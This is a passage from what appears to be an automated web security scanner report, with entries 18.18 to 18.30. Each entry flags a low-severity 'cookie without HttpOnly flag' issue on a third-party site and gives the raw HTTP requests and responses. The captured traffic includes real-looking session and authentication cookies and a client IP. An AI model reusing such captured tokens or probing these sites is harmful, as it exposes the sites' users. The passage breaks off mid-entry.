GET /event.flow?eventcode=000_000_15&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=0%2C0&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888; JSESSIONID=4D2F096A244DBA369FB4DA24E6E71E58

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=37CA52C814AA647559229DADBB815529; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 0
Date: Sun, 24 Apr 2011 12:26:22 GMT


18.18. http://hillandknowlton.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hillandknowlton.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hillandknowlton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 01:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Set-Cookie: SESS5e4e256574068223638a5e6eb0172639=fnfjc11l0e5bqq3p1mcei2o0o7; expires=Wed, 18 May 2011 05:03:17 GMT; path=/; domain=.hillandknowlton.com
Last-Modified: Mon, 25 Apr 2011 00:54:49 GMT
ETag: "1d0be2322375aa0717fea3de5cf69722"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<me
...[SNIP]...

18.19. http://img.securepaynet.net/image.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.securepaynet.net
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.296151316862624&page=%2fdefault.aspx&referrer=http%3a%2f%2fkroogy.com%2fpub%2fbanner_728_90_random.php&ci=1767&split=30&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet HTTP/1.1
Host: img.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; path=/
Set-Cookie: pagecount=1; domain=.securepaynet.net; path=/
Set-Cookie: fb_pagecount=1; path=/
Set-Cookie: actioncount=; domain=.securepaynet.net; path=/
Set-Cookie: fb_actioncount=; path=/
Set-Cookie: app_pathway=; domain=.securepaynet.net; path=/
Set-Cookie: fb_session=S_TOUCH=04/24/2011 12:42:14&pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b&V_DATE=04/24/2011 05:42:14; path=/
Set-Cookie: isc=kro_2011; domain=.securepaynet.net; path=/
Set-Cookie: visitor=vid=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; expires=Mon, 23-Apr-2012 12:42:14 GMT; path=/
Set-Cookie: traffic=; domain=.securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sun, 24 Apr 2011 12:42:13 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

18.20. http://inter.viewcentral.com/events/redir/redir.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://inter.viewcentral.com
Path:   /events/redir/redir.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/redir/redir.aspx?/arcsight/home HTTP/1.1
Host: inter.viewcentral.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VCInter=2399469578.20480.0000

Response

HTTP/1.1 302 Found
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Date: Sun, 24 Apr 2011 20:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 1.1.4322
Location: /events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
Set-Cookie: ASP.NET_SessionId=gof21umxf0ksbcehkcfl2g45; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 213

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/events/cust/search_results.aspx?cid=arcsight&amp;cat3_id=16&amp;pid=1&amp;event_id=20&amp;lid=1'>here</a>.</h2>
</b
...[SNIP]...

18.21. http://leadback.netseer.com/dsatserving2/servlet/log  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://leadback.netseer.com
Path:   /dsatserving2/servlet/log

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/log?pxid=1124&nlt=ltpx&url=http%3A%2F%2Fwww.identityguard.com%2Fipages%2Fle4%2Fletp30daysfree1.html%3Fmktp%3DNext%26utm_medium%3Daffiliates%26hid%3D205557649%26campid%3D13%26c1%3Did4%2B106163471CD1%26c2%3DCD1%26cenhp1%3D1&impt=0&imps=0 HTTP/1.1
Host: leadback.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6FE9E355E2568F5F32FAD5F08891554D.dsat4; Path=/dsatserving2
Set-Cookie: netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Content-Type: image/png
Date: Sun, 24 Apr 2011 03:09:54 GMT
Content-Length: 70

.PNG
.
...IHDR....................IDATx.c``...........}....IEND.B`.

18.22. https://membership.identitymonitor.citi.com/pages2/english/neworder.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://membership.identitymonitor.citi.com
Path:   /pages2/english/neworder.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages2/english/neworder.asp?source=IMN00518&ordsrc= HTTP/1.1
Host: membership.identitymonitor.citi.com
Connection: keep-alive
Referer: http://www.identitymonitor.citi.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_p7%3Dno%2520value%7C1303676167327%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dundefined%255E%255Ehttp%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255Eundefined%2520%257C%2520http%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255E%3B%20s_sq%3Dprod%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.identitymonitor.citi.com%2525252F%252526oid%25253Dhttps%2525253A%2525252F%2525252Fmembership.identitymonitor.citi.com%2525252Fpages2%2525252Fenglish%2525252Fneworder.asp%2525253Fsource%2525253DIMN00518%25252526ordsrc%2525253D%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3385
Content-Type: text/html;charset=ISO-8859-1
Expires: Sun, 24 Apr 2011 03:28:46 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCEDSBRSR=BPBAFOOBCBCJBCIBHDGNANJD; secure; path=/
Date: Sun, 24 Apr 2011 20:07:46 GMT

<html><head></head><body><form name=formt action='https://membership.identitymonitor.citi.com/Switch.aspx' method=post><input type=hidden name='RELXDATA' value='28E5E72B22048B8DF7D88C2AD30A3DAE8C51B2
...[SNIP]...

18.23. https://netserv.fpoint.com/redir/redirect.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://netserv.fpoint.com
Path:   /redir/redirect.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redir/redirect.asp?rdtl=985 HTTP/1.1
Host: netserv.fpoint.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sun, 24 Apr 2011 16:56:47 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: http://www.gcpowertools.com/products/SpreadforASPNET
Content-Length: 173
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCRATADB=IFFBGJCCGOADNKFFABKOHIED; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.gcpowertools.com/products/SpreadforASPNET">here</a>.</body>

18.24. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=81294%20a%3dbc58b4f6d9f9&Face=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=957221386.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:53:56 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000j5aKXIpvhYDsmuOaqAi_4qD:14ia6c7a4; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b;Version=1;path=/
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=655231498.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...

18.25. https://protect724.arcsight.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://protect724.arcsight.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: protect724.arcsight.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; __utmb=226624333

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 20:19:02 GMT
Server: Apache-Coyote/1.1
X-JAL: 1
Location: https://protect724.arcsight.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.server.info="serverName=protect724.arcsight.com:serverPort=443:contextPath=:localName=sgauwa100p:localPort=9201:localAddr=127.0.0.1"; Version=1; Path=/
Set-Cookie: JSESSIONID=7601BD8FD22C0BE72201B028BE68CCE8.node0; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=2219 t=1303676342121021
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerPool_97_SM11-7001=1108904202.22811.0000; path=/
Content-Length: 0


18.26. http://sales.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=31254474&d_id=truecredit-sales HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647176210

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:53:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 49
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSSQBBBCR=CMDFAGGAMCNBIHKIGDLDPLFE; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 31254474
lpAddMonitorTag();

18.27. http://seal.controlcase.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?page=showCert&cId=3063048179 HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:10:09 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=6acda14de92cdb5a62e55e1a4a4b0b6b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4550
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />

<form name="showCert" method='POST' action='index.php?page=showCert'>
<Body o
...[SNIP]...

18.28. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:36:12 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000KToyasEeVy_fQHf6TuSK9Mc:14ej3pg70; Path=/
Set-Cookie: REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; Expires=Sun, 08 May 2011 03:35:20 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002777198=100000002777198%2cVoEQEMAaxiiOxH5%2fHe03xssaVwY%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002777198=100000002777198%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvblgaG4LolUzuM7owtK6Gi%2bVaq7muVpgRvizF3GEYunmq5qAGshvG%2fXVXEJobjTsDIa%0auhm1cgxjc8Dg7Bta%2bhk6VW6qOQMB228jrA07GAd7ulM%2f%2bYbi2c00FUf8MBs4lni1kKc%2bItFLUY8t%0a%2bqcUB9ES; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


18.29. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le33/letp30daysfree33.html?mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmz=242046173.1303674405.2.2.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303674405.2; __utmc=242046173; 90226925_clogin=l=1303677758&v=1&e=1303678665607

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:43:32 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=58&mktp=Next&cenhp1=1&hid=205561061&c1=CD76&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRuhiTmGlNQlKR0CJE8wZVQkY%0Ay2Jx5sZm2%2Bc1nEEXBnYuQQ3BWvtpmM6coDK2OOHmKwKxClJA89ePCaUt39rN8VuwBucOvrx%2B9TkJ%0A6crEVWo0rY%2FXGTgGduabk5azXxfx8Q%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000c3d68erGa8XMQGd_2dqp2tI:14glhsrp2; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002780393=100000002780393%2c0tUiqY%2bh4ueMUlR80CUXFIFyzig%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002780393=100000002780393%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvbaPS8OMuDprrXw%2bctfg%2fFQfgKprQwzfue95Bem%2bD0Rybv6t6W3ThtgfeBnJx04RieF%0aa2t5F6ax7Pxa0pnWDckRKfyuP6GyE8B4GxiySWMu0m5Fqpnsl7jxXyiLbaIxcQXvsSVpN5Yurslj%0a1K%2fzReuF; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


18.30. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Low
Confidence:   Firm
